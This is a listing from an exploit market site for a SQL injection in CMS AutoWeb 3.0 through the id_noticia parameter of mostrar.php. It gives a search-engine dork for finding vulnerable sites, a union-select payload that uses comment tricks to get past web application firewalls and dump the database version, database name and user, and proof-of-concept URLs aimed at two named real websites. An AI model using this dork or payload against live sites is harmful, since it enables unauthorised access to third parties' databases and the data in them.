[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CMS AutoWeb 3.0 SQL Injection Vulnerability

Author
Felipe Andrian Peixoto
Risk
[
Security Risk High
]
0day-ID
0day-ID-22697
Category
web applications
Date add
25-09-2014
Platform
php
[+] Sql Injection on CMS AutoWeb v3.0

[+] Date: 24/09/2014

[+] CWE Number : CWE-89

[+] Risk: High

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://www.multdivision.com.br

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Linux

[+] Vulnerable File: mostrar.php

[+} Dork : inurl:"mostrar.php?id_noticia="

[+] Exploit : http://host/mostrar.php?id_noticia=[SQL Injection]

  ps:need bypass the WAF protection use sql injection manual.
 
[+] PoC:  

http://www.cbnmogi.com.br/mostrar.php?id_noticia=2671+and+0+/*!12345union*/+/*!12345select*/+1,version%28%29,database%28%29,4,user%28%29,6,7,8,9,10--+ <-- example of how to xploit

http://fmg.edu.br/mostrar.php?id_noticia=77' 

[+] Admin Page: http://host/admin/

#  0day.today [2024-12-24]  #